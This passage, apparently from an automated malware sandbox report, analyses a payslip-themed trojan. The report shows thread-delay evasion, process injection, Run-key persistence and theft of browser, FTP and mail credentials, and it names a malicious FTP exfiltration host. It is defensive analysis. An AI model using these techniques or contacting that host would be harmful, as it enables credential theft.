                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594900Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594794Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594681Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599649Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599422Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597248Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596998Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594606Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594397Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594282Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594157Jump to behavior
                    Source: sgxIb.exe, 00000008.00000002.4491421148.0000000001498000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4490676412.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2250372221.000000000109C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Memory written: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Memory written: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Process created: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe "C:\Users\user\Desktop\Payslip_October_2024_pdf.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q9<b>[ Program Manager]</b> (04/11/2024 18:06:09)<br>{Win}rTHbq
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR]q
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EDB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <html>Time: 11/17/2024 21:53:38<br>User Name: user<br>Computer Name: 960781<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 173.254.250.69<br><hr><b>[ Program Manager]</b> (04/11/2024 18:06:09)<br>{Win}r</html>
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q8<b>[ Program Manager]</b> (04/11/2024 18:06:09)<br>{Win}THbq
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q3<b>[ Program Manager]</b> (04/11/2024 18:06:09)<br>
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Queries volume information: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Queries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match File source: dump.pcap, type: PCAP
                    Source: Yara match File source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000005.00000002.2252894462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000008.00000002.4494723073.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.2252894462.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000008.00000002.4494723073.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.4494330855.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Payslip_October_2024_pdf.exe PID: 2888, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Payslip_October_2024_pdf.exe PID: 528, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: sgxIb.exe PID: 6552, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: sgxIb.exe PID: 2800, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                    Remote Access Functionality

                    Source: Yara match File source: dump.pcap, type: PCAP
                    Source: Yara match File source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000005.00000002.2252894462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000008.00000002.4494723073.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.2252894462.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000008.00000002.4494723073.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.4494330855.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Payslip_October_2024_pdf.exe PID: 2888, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Payslip_October_2024_pdf.exe PID: 528, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: sgxIb.exe PID: 6552, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: sgxIb.exe PID: 2800, type: MEMORYSTR
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 112 Process Injection | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 3 Obfuscated Files or Information | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 211 Security Software Discovery | Distributed Component Object Model | 21 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 2 Process Discovery | SSH | 1 Clipboard Data | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 141 Virtualization/Sandbox Evasion | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 112 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Hidden Files and Directories | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                    [Behavior graph. Behavior Graph ID: 1548311, Sample: Payslip_October_2024_pdf.exe, Startdate: 04/11/2024, Architecture: WINDOWS, Score: 100]

                    Source | Detection | Scanner | Label
                    Payslip_October_2024_pdf.exe | 34% | ReversingLabs | Win32.Trojan.Generic
                    Payslip_October_2024_pdf.exe | 100% | Joe Sandbox ML |

                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | 100% | Joe Sandbox ML |
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | 34% | ReversingLabs | Win32.Trojan.AgentTesla

                    No Antivirus matches
                    No Antivirus matches

                    Source | Detection | Scanner | Label
                    https://api.ipify.org/ | 0% | URL Reputation | safe
                    https://api.ipify.org | 0% | URL Reputation | safe
                    https://account.dyn.com/ | 0% | URL Reputation | safe
                    https://api.ipify.org/t | 0% | URL Reputation | safe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                    http://ftp.haliza.com.my | 0% | Avira URL Cloud | safe
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    api.ipify.org | 172.67.74.152 | true | false | | unknown
                    ftp.haliza.com.my | 110.4.45.197 | true | true | | unknown

                    Name | Malicious | Antivirus Detection | Reputation
                    https://api.ipify.org/ | false | URL Reputation: safe | unknown
                        Name | Source | Malicious | Antivirus Detection | Reputation
                        https://api.ipify.org | Payslip_October_2024_pdf.exe, 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2252894462.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.000000000304C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://account.dyn.com/ | Payslip_October_2024_pdf.exe, 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://ftp.haliza.com.my | Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EDB000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2252894462.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.0000000003468000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.0000000003257000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.0000000003291000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        https://api.ipify.org/t | sgxIb.exe, 00000005.00000002.2252894462.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.000000000304C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2252894462.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.000000000304C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        IP | Domain | Country | ASN | ASN Name | Malicious
                        110.4.45.197 | ftp.haliza.com.my | Malaysia | 46015 | EXABYTES-AS-APExaBytesNetworkSdnBhdMY | true
                        172.67.74.152 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1548311
                        Start date and time:2024-11-04 10:12:10 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 2s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Payslip_October_2024_pdf.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@9/4@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 280
                        • Number of non-executed functions: 34
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • VT rate limit hit for: Payslip_October_2024_pdf.exe
                        Time | Type | Description
                        04:12:59 | API Interceptor | 8875822x Sleep call for process: Payslip_October_2024_pdf.exe modified
                        04:13:12 | API Interceptor | 7027046x Sleep call for process: sgxIb.exe modified
                        10:13:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                        10:13:12 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                            Process:C:\Users\user\Desktop\Payslip_October_2024_pdf.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
